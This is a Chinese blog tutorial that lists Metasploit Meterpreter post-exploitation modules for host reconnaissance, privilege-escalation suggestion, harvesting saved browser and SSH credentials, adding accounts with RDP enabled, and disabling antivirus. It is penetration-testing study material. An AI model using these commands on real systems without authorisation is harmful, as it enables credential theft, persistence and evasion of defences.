kali metasploit 后渗透Post模块

已于 2022-11-01 14:15:13 修改
阅读量391 收藏 1
点赞数
分类专栏: Metasploit内网 文章标签: 服务器 运维
于 2022-10-28 19:08:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51685718/article/details/127519140
版权

00.各文件生成保存路径

/root/.msf4/loot/

01.获取目标机器的分区情况:

meterpreter > run post/windows/gather/forensics/enum_drives
在这里插入图片描述

02.判断目标机是否为虚拟机:

run post/windows/gather/checkvm
在这里插入图片描述

03.查看目标机开启哪些服务:

run post/windows/gather/enum_services
在这里插入图片描述

04.查看目标机安装了哪些应用、补丁:

run post/windows/gather/enum_applications
在这里插入图片描述

05.查看目标机最近的操作:

run post/windows/gather/dumplinks
在这里插入图片描述

06.post的提权模块:

如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能
post/multi/recon/local_exploit_suggester
在这里插入图片描述

07.目标主机环境变量信息:

run post/multi/gather/env
在这里插入图片描述

08.目标主机火狐浏览器保存的账号密码:

run post/multi/gather/firefox_creds
在这里插入图片描述
我这由于没安装火狐导致报错

09.目标主机保存的ssh身份验证信息(linux系统常用)

run post/multi/gather/ssh_creds

0A.目标主机当前在线的用户(SID=500是管理员账号):

run post/windows/gather/enum_logged_on_users
在这里插入图片描述

FF.其他操作

run post/wndows/manage/delete_user username=aiyou 删除用户
run post/windows/manage/enable_rdp USERNAME=aiyou PASSWORD=aiyou 添加账户
windows/manage/killav 关闭杀软
run post/windows/gather/enum_ie 获取IE缓存
run post/windows/gather/enum_chrome 获取Chrome缓存

兰公子&
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali [Empire] 后渗透测试
weixin_45253622的博客
03-23 846
Empire的使用 安装 git clone https://github.com/EmpireProject/Empire.git cd setup ./install.sh 进入Empire目录,./empire 打开Empire 输入help查看帮助 启动 ./empire
Metasploit框架入门与实战:通往渗透测试核心地带的桥梁
Kali与编程
04-10 255
exploit模块负责利用目标系统的漏洞,payload模块则负责在成功利用漏洞后执行特定任务,auxiliary模块提供非攻击性质的功能,如扫描、枚举和信息收集,post模块则用于在取得目标系统权限后进行进一步的信息收集和权限维持。Metasploit是一款强大的开源渗透测试框架,它为安全研究人员、渗透测试工程师和红队成员提供了一个综合的平台,用以发现、利用和验证漏洞,同时也支持自定义模块开发和社交工程攻击。Payload模块在成功利用漏洞后执行,可以实现从简单的反弹shell到复杂的持久化后门等任务。
post模块
12-11
post模块
metasploit post模块介绍
热门推荐
星落的博客
05-26 1万+
post模块介绍 通过run或bgrun进行调用,对目标系统进行入侵。 实例演示 1.对目标网络进行arp扫描 run post/windows/gather/arp_scanner 2.检验目标是否为虚拟机 run post/windows/gather/checkvm 3.枚举应用 run post/windows/gather/enum_applications 4.枚举登录用户 run post/windows/gather/enum_logged_on_users
Metasploit -- 后渗透模块(POST)
weixin_41489908的博客
03-01 924
​给时间一点时间,让过去过去,让开始开始。。。 ---- 网易云热评 作用:获取目标主机后shell后,继续信息收集,提权 1、获取目标分区情况 run post/windows/gather/forensics/enum_drives 2、检测是否是虚拟主机 run post/windows/gather/checkvm 3、获取当前安装的应用程序 runpost/windows/gather/enum_applications 4、获取用户登录信息 run post/..
kali linux之msf后渗透阶段
weixin_30606461的博客
03-11 549
已经获得目标操作系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有session扩大战果 绕过UAC限制 use exploit/windows/local/askset session -idset filenameuse exploit/windows/local/bypassuacuse exploit/windows/local...
Kali Linux 安全渗透教程
06-13
Kali Linux 安全渗透教程
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
metasploit-学习7--显示post模块的所有post信息
简单就是美
06-15 6914
不好意思,由于本文太长,我用程序生成此博文的锚点链接,可是一发布就没有。是不是csdn不支持锚点,还是我操作错误。在这里给大家带来的不便,还请见谅!  Name                                             Disclosure Date  Rank    Description    ----
kali渗透学习-后渗透利用阶段(本地提权,抓包嗅探)
weixin_43239236的博客
01-23 484
本地提权 已实现本地低权限账号登录 远程溢出 直接获得账号密码 希望获取更高权限 实现对目标进一步控制 系统账号之间权限隔离 操作系统安全的基础 用户空间 内核空间 系统账号 用户账号登陆时获取权限令牌 账号无需用户登陆已在后台启动服务 Windows的用户权限 user<Administrator<System Linux的用户权限 User<Root 获取Windows system权限的几种方法 1、利用at命令直接会调用system【at /?】##只能在XP与2003的系统上使用
kali渗透学习-后渗透利用阶段(windos上传工具)
weixin_43239236的博客
01-23 285
入侵成功后,后漏洞利用阶段 1.上传工具 2.提权 3.擦除攻击痕迹 4.安装后门 长期控制 Dump 密码 内网渗透 后漏洞利用阶段最大的挑战 ----防病毒软件(免杀) 使用合法的远程控制软件 或者使用免杀技术 上传工具 实现持久控制和扩大对目标系统的控制能力 Linux系统自带的一些可利用下载工具 netcat curl wget Windows缺少预装的下载工具 windos缺少预装的下载工具,可以有以下几种思路 非交互模式 shell(例如不会提示你输入密码,可以先将命令写入到一个文件,
渗透学习之Metasploitpost模块使用信息收集
来到了学渣的博客
02-22 2783
环境 Kali和win7是nat连接 Kali:192.168.10.145 Win7:192.168.10.143 如果Msf拿shell后出现乱码,输入chcp 65001即可 MSF的post模块 进入msf5 > search post,搜索post模块,发现有471个模块可使用,我挑一部分出来翻译大概看看是用来干嘛的 Linux: Window: 首先得拿一个cmd的s...
requests模块post/get基本用法
阳光柠檬_的技术笔记
08-23 1万+
python用requests模块post/get接口 pip install requests 安装requests模块 实例:# -*- coding: utf-8 -*- import sys reload(sys) sys.setdefaultencoding('utf8') import requests import jsondef zp(r): try:
Kali下Sqlmap工具使用方法之POST方法篇
Liu_Bruce的博客
09-18 5432
大家好,上周讲解了SQL注入漏洞实验的GET方法测试过程。今天向大家继续讲解SQL注入漏洞的POST方法测试过程。工具是大家熟悉的Sqlmap,Sqlmap是一款开源的SQL注入漏洞检测与利用神器,没有之一。测试平台是漏洞扫描工具AWVS的测试平台:http://testphp.vulnweb.com,kali系统,今天还用到抓包工具OWASP ZAP2.5.0。因为POST方法需要用抓包工具抓到post请求包,然后存成txt文件。 下面介绍一下操作步骤: ——————————————...
Msf后渗透测试阶段_POST模块
分享学习网络的点点滴滴
01-10 271
【代码】Msf后渗透测试阶段_POST模块
华纳云:在一个服务器上如何设置多个IP地址?
YOKEhn的博客
05-27 424
在Windows上,可以通过网络连接的高级TCP/IP设置或使用netsh命令添加多个IP地址。在一个服务器上设置多个IP地址的具体步骤取决于所使用的操作系统(例如Linux或Windows)。你也可以使用ip命令临时配置多个IP地址,这在需要立即生效但不重启网络服务的情况下非常有用。在“IP 设置”标签下,点击“添加”按钮,输入新的IP地址和子网掩码,然后点击“添加”。选择“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。右键点击要配置的网络适配器,选择“属性”。
如何增加服务器的高并发
最新发布
gulu230220的博客
05-31 254
综上所述,通过优化代码和算法、采用异步编程、使用缓存技术、数据库优化等多种方法,可以有效地提升服务器的高并发性能。哈喽呀大家好呀,淼淼又来和大家见面啦,随着互联网应用的普及和用户量的不断增加,服务器的高并发性能成为了开发者们面临的一项重要挑战。通过优化代码结构、减少不必要的计算、使用高性能的数据结构等方法,可以提高服务器的并发处理能力,降低响应时间。数据库是很多应用的瓶颈之一,通过优化数据库结构、索引、查询语句等,可以提高数据库的并发处理能力,从而提升整个系统的性能。1. 优化代码和算法。
kali metasploit
08-30
你可以使用命令"msfconsole"来启动Metasploit Framework的交互式控制台,然后可以通过各种模块和插件来执行各种渗透测试任务。请注意,在使用Metasploit进行渗透测试时,务必严格遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值